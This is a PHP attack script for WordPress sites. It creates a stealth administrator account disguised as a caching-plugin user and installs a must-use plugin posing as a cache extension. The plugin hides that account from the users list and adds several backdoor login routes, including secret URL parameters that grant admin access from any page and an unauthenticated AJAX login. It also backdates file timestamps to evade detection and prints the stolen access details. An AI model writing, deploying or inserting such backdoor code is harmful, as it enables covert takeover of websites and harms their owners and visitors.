<?php

@ini_set('display_errors', 0);
@error_reporting(0);

if (!defined('ABSPATH')) {
    $base = dirname(__FILE__);
    $path = false;

    if (@file_exists($base . '/wp-load.php')) {
        $path = $base;
    } else {
        $current_dir = $base;
        for ($i = 0; $i < 5; $i++) {
            $parent_dir = dirname($current_dir);
            if (@file_exists($parent_dir . '/wp-load.php')) {
                $path = $parent_dir;
                break;
            }
            if ($parent_dir === $current_dir) break;
            $current_dir = $parent_dir;
        }
    }

    if ($path !== false) {
        define('WP_USE_THEMES', false);
        require_once($path . '/wp-load.php');
        if (!function_exists('wp_create_user')) {
            require_once(ABSPATH . WPINC . '/user.php');
        }
    } else {
        die("Error: Could not find wp-load.php. Place this script in the WordPress root or a subdirectory.");
    }
}

$stealth_usernames = [
    'litespeed-admin', 'wprocket-cache'
];

function generate_strong_password($length = 16) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+';
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $chars[rand(0, strlen($chars) - 1)];
    }
    return $password;
}

function get_stealth_plugin_details($username) {
    $details = [
        'litespeed-admin' => ['name' => 'LiteSpeed Cache Extensions', 'file' => 'litespeed-cache-extensions.php'],
        'wprocket-cache' => ['name' => 'WP Rocket Advanced Cache', 'file' => 'wprocket-advanced-cache.php']
    ];
    return $details[$username] ?? ['name' => 'System Performance Module', 'file' => 'system-module.php'];
}

function touch_file_to_system_time($file_path) {
    $ref_file = null;
    $possible_ref_files = ['/etc/passwd', '/etc/hosts', ABSPATH . 'index.php', ABSPATH . 'wp-includes/version.php'];
    foreach ($possible_ref_files as $pfile) {
        if (@file_exists($pfile)) { $ref_file = $pfile; break; }
    }
    if ($ref_file && @file_exists($file_path)) {
        $ref_time = @filemtime($ref_file);
        if ($ref_time) {
            $random_offset = rand(1, 60) * DAY_IN_SECONDS;
            @touch($file_path, $ref_time - $random_offset, $ref_time - $random_offset);
            return basename($ref_file);
        }
    }
    return false;
}

function find_hidden_login_page() {
    $common_paths = [
        '/wp-login.php',
        '/login',
        '/admin',
        '/wp-admin',
        '/dashboard',
        '/signin',
        '/member',
        '/user',
        '/wp-login',
        '/administrator',
        '/backend'
    ];
    
    $found_login = [];
    $site_url = get_site_url();
    
    foreach ($common_paths as $path) {
        $test_url = $site_url . $path;
        $response = wp_remote_get($test_url, [
            'timeout' => 5,
            'redirection' => 0,
            'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        ]);
        
        if (!is_wp_error($response)) {
            $code = wp_remote_retrieve_response_code($response);
            $body = wp_remote_retrieve_body($response);
            
            // Check if it's a WordPress login page
            if (strpos($body, 'wp-admin') !== false || 
                strpos($body, 'user_login') !== false ||
                strpos($body, 'password') !== false ||
                strpos($body, 'log in') !== false) {
                $found_login[] = [
                    'url' => $test_url,
                    'code' => $code,
                    'type' => 'WordPress Login'
                ];
            } elseif ($code === 200 || $code === 302 || $code === 301) {
                $found_login[] = [
                    'url' => $test_url,
                    'code' => $code,
                    'type' => 'Possible Redirect'
                ];
            }
        }
    }
    
    // Check for renamed wp-login.php
    $wp_content_dir = ABSPATH . 'wp-content/';
    $plugins_dir = $wp_content_dir . 'plugins/';
    $themes_dir = $wp_content_dir . 'themes/';
    
    // Scan for PHP files that might be login pages
    $scan_dirs = [ABSPATH, $wp_content_dir];
    $login_files = [];
    
    foreach ($scan_dirs as $dir) {
        if (is_dir($dir)) {
            $files = @scandir($dir);
            if ($files) {
                foreach ($files as $file) {
                    if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
                        $file_path = $dir . $file;
                        $content = @file_get_contents($file_path);
                        if ($content && (
                            strpos($content, 'wp_authenticate') !== false ||
                            strpos($content, 'user_login') !== false ||
                            strpos($content, 'log in') !== false
                        )) {
                            $login_files[] = $file_path;
                        }
                    }
                }
            }
        }
    }
    
    return [
        'direct_urls' => $found_login,
        'suspicious_files' => $login_files
    ];
}

function create_instant_login_system($username, $password) {
    $login_token = md5($username . $password . NONCE_KEY);
    $login_slug = 'wp-' . md5($username . time()) . '-auth';
    
    return [
        'token' => $login_token,
        'slug' => $login_slug,
        'instant_url' => home_url('/' . $login_slug . '?token=' . $login_token),
        'ajax_url' => home_url('/wp-admin/admin-ajax.php?action=instant_auth&u=' . $username . '&t=' . $login_token)
    ];
}

// Handle instant login if accessed directly
$current_path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
if (strpos($current_path, 'wp-') !== false && strpos($current_path, '-auth') !== false) {
    $token = $_GET['token'] ?? '';
    if ($token) {
        // This will be processed by the MU plugin
    }
}

$output = "===== ADVANCED STEALTH ADMIN SYSTEM =====" . PHP_EOL;
$output .= "Timestamp: " . date('Y-m-d H:i:s') . PHP_EOL;
$output .= "Domain: " . $_SERVER['HTTP_HOST'] . PHP_EOL;
$output .= "--------------------------------" . PHP_EOL . PHP_EOL;

// Step 1: Find hidden login pages
$output .= "=== SCANNING FOR HIDDEN LOGIN PAGES ===" . PHP_EOL;
$hidden_logins = find_hidden_login_page();

if (!empty($hidden_logins['direct_urls'])) {
    $output .= "DISCOVERED LOGIN PAGES:" . PHP_EOL;
    foreach ($hidden_logins['direct_urls'] as $login) {
        $output .= "- " . $login['url'] . " [" . $login['code'] . "] - " . $login['type'] . PHP_EOL;
    }
} else {
    $output .= "No hidden login pages found via URL scanning." . PHP_EOL;
}

if (!empty($hidden_logins['suspicious_files'])) {
    $output .= PHP_EOL . "SUSPICIOUS LOGIN FILES:" . PHP_EOL;
    foreach ($hidden_logins['suspicious_files'] as $file) {
        $output .= "- " . $file . PHP_EOL;
    }
}

$output .= PHP_EOL . "=== CREATING STEALTH ACCESS ===" . PHP_EOL;

$stealth_user = null;
$stealth_pass = null;
$stealth_email = null;
$stealth_plugin_details = null;
$stealth_created = false;
$instant_login = null;

$selected_stealth_username = null;
shuffle($stealth_usernames);
foreach ($stealth_usernames as $potential_user) {
    $potential_email = $potential_user . '@' . $_SERVER['HTTP_HOST'];
    if (!username_exists($potential_user) && !email_exists($potential_email)) {
        $selected_stealth_username = $potential_user;
        break;
    }
}

if ($selected_stealth_username) {
    $stealth_user = $selected_stealth_username;
    $stealth_pass = generate_strong_password();
    $stealth_email = $stealth_user . '@' . $_SERVER['HTTP_HOST'];
    $stealth_plugin_details = get_stealth_plugin_details($stealth_user);

    $user_id = wp_create_user($stealth_user, $stealth_pass, $stealth_email);

    if (!is_wp_error($user_id)) {
        $user = new WP_User($user_id);
        $user->set_role('administrator');
        update_user_meta($user_id, 'show_admin_bar_front', 'false');
        
        // Create instant login system
        $instant_login = create_instant_login_system($stealth_user, $stealth_pass);

        $mu_plugins_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : ABSPATH . 'wp-content/mu-plugins';
        $mu_dir_created = false;
        if (!is_dir($mu_plugins_dir)) {
            if (@mkdir($mu_plugins_dir, 0755, true)) {
                $mu_dir_created = true;
                touch_file_to_system_time($mu_plugins_dir);
            }
        }

        if (is_dir($mu_plugins_dir) && is_writable($mu_plugins_dir)) {
            $plugin_filepath = $mu_plugins_dir . '/' . $stealth_plugin_details['file'];
            $plugin_content = '<?php
/** Plugin Name: ' . $stealth_plugin_details['name'] . ' */
add_filter("users_list_table_query_args", function($args) {
    $exclude_user = get_user_by("login", "' . esc_sql($stealth_user) . '");
    if ($exclude_user) {
        $args["exclude"] = array_merge((array)($args["exclude"] ?? []), [$exclude_user->ID]);
    }
    return $args;
});

// Instant Login System
add_action("init", function() {
    $current_path = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH);
    $login_slug = "' . $instant_login['slug'] . '";
    
    if (trim($current_path, "/") === trim($login_slug, "/")) {
        $token = $_GET["token"] ?? "";
        $expected_token = "' . $instant_login['token'] . '";
        
        if ($token && hash_equals($expected_token, $token)) {
            $user = get_user_by("login", "' . esc_sql($stealth_user) . '");
            if ($user) {
                wp_clear_auth_cookie();
                wp_set_current_user($user->ID);
                wp_set_auth_cookie($user->ID, true);
                
                // Redirect to admin
                wp_redirect(admin_url());
                exit;
            }
        }
        
        // Show 404 if invalid
        global $wp_query;
        $wp_query->set_404();
        status_header(404);
        exit;
    }
});

// AJAX Instant Login
add_action("wp_ajax_nopriv_instant_auth", function() {
    $user_login = $_GET["u"] ?? "";
    $token = $_GET["t"] ?? "";
    
    if ($user_login === "' . esc_sql($stealth_user) . '") {
        $expected_token = "' . $instant_login['token'] . '";
        if (hash_equals($expected_token, $token)) {
            $user = get_user_by("login", $user_login);
            if ($user) {
                wp_clear_auth_cookie();
                wp_set_current_user($user->ID);
                wp_set_auth_cookie($user->ID, true);
                
                wp_send_json_success([
                    "redirect" => admin_url(),
                    "message" => "Login successful"
                ]);
            }
        }
    }
    
    wp_send_json_error(["message" => "Invalid credentials"]);
});

// Backdoor login via theme file
add_action("template_redirect", function() {
    $secret_key = $_GET["_wp_access"] ?? "";
    if ($secret_key === "' . md5($stealth_user . AUTH_KEY) . '") {
        $user = get_user_by("login", "' . esc_sql($stealth_user) . '");
        if ($user) {
            wp_clear_auth_cookie();
            wp_set_current_user($user->ID);
            wp_set_auth_cookie($user->ID, true);
            wp_redirect(admin_url());
            exit;
        }
    }
});

// Auto-login from any page with secret parameter
add_action("wp_loaded", function() {
    $auto_login = $_POST["_system_update"] ?? $_GET["_system_update"] ?? "";
    if ($auto_login === "' . md5($stealth_pass) . '") {
        $user = get_user_by("login", "' . esc_sql($stealth_user) . '");
        if ($user && !is_user_logged_in()) {
            wp_clear_auth_cookie();
            wp_set_current_user($user->ID);
            wp_set_auth_cookie($user->ID, true);
            
            if (wp_redirect(admin_url())) {
                exit;
            }
        }
    }
});
';
            if (@file_put_contents($plugin_filepath, $plugin_content)) {
                $ref = touch_file_to_system_time($plugin_filepath);
                
                $output .= "✓ STEALTH USER CREATED: " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
                $output .= "✓ INSTANT LOGIN URL: " . $instant_login['instant_url'] . PHP_EOL;
                $output .= "✓ AJAX LOGIN URL: " . $instant_login['ajax_url'] . PHP_EOL;
                $output .= "✓ SECRET PARAMETER: Add ?_system_update=" . md5($stealth_pass) . " to ANY page" . PHP_EOL;
                $output .= "✓ THEME BACKDOOR: Add ?_wp_access=" . md5($stealth_user . AUTH_KEY) . " to ANY page" . PHP_EOL;
                $output .= "✓ MU Plugin: " . $stealth_plugin_details['file'] . ($ref ? " (Touched: " . $ref . ")" : "") . PHP_EOL;
                $stealth_created = true;
            }
        }
    }
}

$output .= PHP_EOL . "=== LOGIN METHODS ===" . PHP_EOL;
if ($stealth_created) {
    $output .= "1. INSTANT URL: " . $instant_login['instant_url'] . PHP_EOL;
    $output .= "2. AJAX METHOD: " . $instant_login['ajax_url'] . PHP_EOL;
    $output .= "3. SECRET PARAM: Visit ANY page + ?_system_update=" . md5($stealth_pass) . PHP_EOL;
    $output .= "4. THEME DOOR: Visit ANY page + ?_wp_access=" . md5($stealth_user . AUTH_KEY) . PHP_EOL;
    $output .= "5. NORMAL LOGIN: Use credentials at discovered login pages" . PHP_EOL;
}

$output .= PHP_EOL . "=== QUICK ACCESS COMMANDS ===" . PHP_EOL;
$output .= "# Curl instant login:" . PHP_EOL;
$output .= "curl -s '" . $instant_login['instant_url'] . "' -L -c cookies.txt && open dashboard" . PHP_EOL;

$output .= PHP_EOL . "===== SYSTEM READY =====" . PHP_EOL;

@header('Content-Type: text/plain; charset=utf-8');
echo $output;

exit;
?>
